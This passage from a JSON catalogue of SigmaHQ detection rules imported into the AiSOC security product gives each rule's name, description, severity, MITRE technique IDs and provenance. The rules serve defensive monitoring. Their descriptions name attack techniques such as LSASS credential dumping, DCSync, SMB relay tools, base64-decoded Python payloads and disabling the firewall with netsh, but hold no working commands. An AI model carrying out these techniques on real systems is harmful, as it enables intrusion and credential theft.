false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-indicating-kerberos-coercion-via-dns-object-spn-spoofing-ne.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5588576c-5898-4fac-bcdd-7475a60e8f43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml" } }, { "id": "sigmahq-sigma-5589ab4f-a767-433c-961d-c91f3f704db1", "type": "detection", "name": "Potential SMB Relay Attack Tool Execution", "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-smb-relay-attack-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5589ab4f-a767-433c-961d-c91f3f704db1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml" } }, { "id": "sigmahq-sigma-5594e67a-7f92-4a04-b65d-1a42fd824a60", "type": "detection", "name": "MSI Installation From Web", "description": "Detects installation of a remote msi file from web.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msi-installation-from-web.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml" } }, { "id": "sigmahq-sigma-55c925c1-7195-426b-a136-a9396800e29b", "type": "detection", "name": "Potential Suspicious Windows Feature Enabled", "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-windows-feature-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55c925c1-7195-426b-a136-a9396800e29b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml" } }, { "id": "sigmahq-sigma-55e29995-75e7-451a-bef0-6225e2f13597", "type": "detection", "name": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-via-lsass-silentprocessexit-technique.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55e29995-75e7-451a-bef0-6225e2f13597", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" } }, { "id": "sigmahq-sigma-55e862a8-dd9c-4651-807a-f21fcad56716", "type": "detection", "name": "Python One-Liners with Base64 Decoding - Linux", "description": "Detects the use of Python's base64 decoding functions in command line executions on Linux systems.\nMalicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.006", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-one-liners-with-base64-decoding-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55e862a8-dd9c-4651-807a-f21fcad56716", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_base64_encoded_execution.yml" } }, { "id": "sigmahq-sigma-55f0a3a1-846e-40eb-8273-677371b8d912", "type": "detection", "name": "Outlook EnableUnsafeClientMailRules Setting Enabled", "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-enableunsafeclientmailrules-setting-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55f0a3a1-846e-40eb-8273-677371b8d912", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" } }, { "id": "sigmahq-sigma-56321594-9087-49d9-bf10-524fe8479452", "type": "detection", "name": "Potential Persistence Via Netsh Helper DLL", "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-netsh-helper-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56321594-9087-49d9-bf10-524fe8479452", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" } }, { "id": "sigmahq-sigma-56454143-524f-49fb-b1c6-3fb8b1ad41fb", "type": "detection", "name": "Suspicious File Download From File Sharing Domain Via Curl.EXE", "description": "Detects potentially suspicious file download from file sharing domains using curl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-file-sharing-domain-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56454143-524f-49fb-b1c6-3fb8b1ad41fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-5687f942-867b-4578-ade7-1e341c46e99a", "type": "detection", "name": "VMToolsd Suspicious Child Process", "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmtoolsd-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5687f942-867b-4578-ade7-1e341c46e99a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" } }, { "id": "sigmahq-sigma-56abae0c-6212-4b97-adc0-0b559bb950c3", "type": "detection", "name": "Important Windows Service Terminated Unexpectedly", "description": "Detects important or interesting Windows services that got terminated unexpectedly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-service-terminated-unexpectedly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml" } }, { "id": "sigmahq-sigma-56c217c3-2de2-479b-990f-5c109ba8458f", "type": "detection", "name": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-default-powersploit-empire-scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56c217c3-2de2-479b-990f-5c109ba8458f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" } }, { "id": "sigmahq-sigma-56d19cb4-6414-4769-9644-1ed35ffbb148", "type": "detection", "name": "Obfuscated IP Via CLI", "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-ip-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56d19cb4-6414-4769-9644-1ed35ffbb148", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml" } }, { "id": "sigmahq-sigma-56e05d41-ce99-4ecd-912d-93f019ee0b71", "type": "detection", "name": "Visual Studio Code Tunnel Remote File Creation", "description": "Detects the creation of file by the \"node.exe\" process in the \".vscode-server\" directory. Could be a sign of remote file creation via VsCode tunnel feature", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-remote-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56e05d41-ce99-4ecd-912d-93f019ee0b71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml" } }, { "id": "sigmahq-sigma-56fa3cd6-f8d6-4520-a8c7-607292971886", "type": "detection", "name": "Cisco BGP Authentication Failures", "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-bgp-authentication-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56fa3cd6-f8d6-4520-a8c7-607292971886", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml" } }, { "id": "sigmahq-sigma-56fda488-113e-4ce9-8076-afc2457922c3", "type": "detection", "name": "Possible DCSync Attack", "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-dcsync-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56fda488-113e-4ce9-8076-afc2457922c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" } }, { "id": "sigmahq-sigma-570ae5ec-33dc-427c-b815-db86228ad43e", "type": "detection", "name": "Application Uninstalled", "description": "An application has been removed. Check if it is critical.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-uninstalled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "570ae5ec-33dc-427c-b815-db86228ad43e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml" } }, { "id": "sigmahq-sigma-571498c8-908e-40b4-910b-d2369159a3da", "type": "detection", "name": "Password Protected ZIP File Opened (Email Attachment)", "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-protected-zip-file-opened-email-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "571498c8-908e-40b4-910b-d2369159a3da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" } }, { "id": "sigmahq-sigma-5722dff1-4bdd-4949-86ab-fbaf707e767a", "type": "detection", "name": "PUA - System Informer Execution", "description": "Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1564", "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-system-informer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5722dff1-4bdd-4949-86ab-fbaf707e767a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_system_informer.yml" } }, { "id": "sigmahq-sigma-572b12d4-9062-11ed-a1eb-0242ac120002", "type": "detection", "name": "Suspicious SignIns From A Non Registered Device", "description": "Detects risky authentication from a non AD registered device without MFA being required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-signins-from-a-non-registered-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "572b12d4-9062-11ed-a1eb-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml" } }, { "id": "sigmahq-sigma-573df571-a223-43bc-846e-3f98da481eca", "type": "detection", "name": "Creation Of a Suspicious ADS File Outside a Browser Download", "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-suspicious-ads-file-outside-a-browser-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "573df571-a223-43bc-846e-3f98da481eca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" } }, { "id": "sigmahq-sigma-575dce0c-8139-4e30-9295-1ee75969f7fe", "type": "detection", "name": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1615", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-reconnaissance-activity-via-gathernetworkinfo-vbs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "575dce0c-8139-4e30-9295-1ee75969f7fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml" } }, { "id": "sigmahq-sigma-576426ad-0131-4001-ae01-be175da0c108", "type": "detection", "name": "PowerShell Script Dropped Via PowerShell.EXE", "description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-dropped-via-powershell-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "576426ad-0131-4001-ae01-be175da0c108", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml" } }, { "id": "sigmahq-sigma-57b649ef-ff42-4fb0-8bf6-62da243a1708", "type": "detection", "name": "Windows Defender Threat Detected", "description": "Detects actions taken by Windows Defender malware detection engines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-threat-detected.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_threat.yml" } }, { "id": "sigmahq-sigma-57bff678-25d1-4d6c-8211-8ca106d12053", "type": "detection", "name": "Remote Access Tool - ScreenConnect Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "57bff678-25d1-4d6c-8211-8ca106d12053", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml" } }, { "id": "sigmahq-sigma-57c4bf16-227f-4394-8ec7-1b745ee061c3", "type": "detection", "name": "Firewall Disabled via Netsh.EXE", "description": "Detects netsh commands that turns off the Windows firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-disabled-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml" } }, { "id": "sigmahq-sigma-5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "type": "detection", "name": "PUA - Radmin Viewer Utility Execution", "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-radmin-viewer-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_radmin.yml" } }, { "id": "sigmahq-sigma-583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "type": "detection", "name": "Java Payload Strings", "description": "Detects possible Java payloads in web access logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/java-payload-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_java_payload_in_access_logs.yml" } }, { "id": "sigmahq-sigma-584bca0f-3608-4402-80fd-4075ff6072e3", "type": "detection", "name": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image", "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-commandline-obfuscation-using-unicode-characters-from-suspicious-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "584bca0f-3608-4402-80fd-4075ff6072e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml" } }, { "id": "sigmahq-sigma-586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", "type": "detection", "name": "Remote Service Activity via SVCCTL Named Pipe", "description": "Detects remote service activity via remote access to the svcctl named pipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-service-activity-via-svcctl-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_svcctl_remote_service.yml" } }, { "id": "sigmahq-sigma-587254ee-a24b-4335-b3cd-065c0f1f4baa", "type": "detection", "name": "Remote File Download Via Findstr.EXE", "description": "Detects execution of \"findstr\" with specific flags and a remote share path. This specific set of CLI flags would allow \"findstr\" to download the content of the file located on the remote share as described in the LOLBAS entry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1564.004", "T1552.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-file-download-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "587254ee-a24b-4335-b3cd-065c0f1f4baa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_download.yml" } }, { "id": 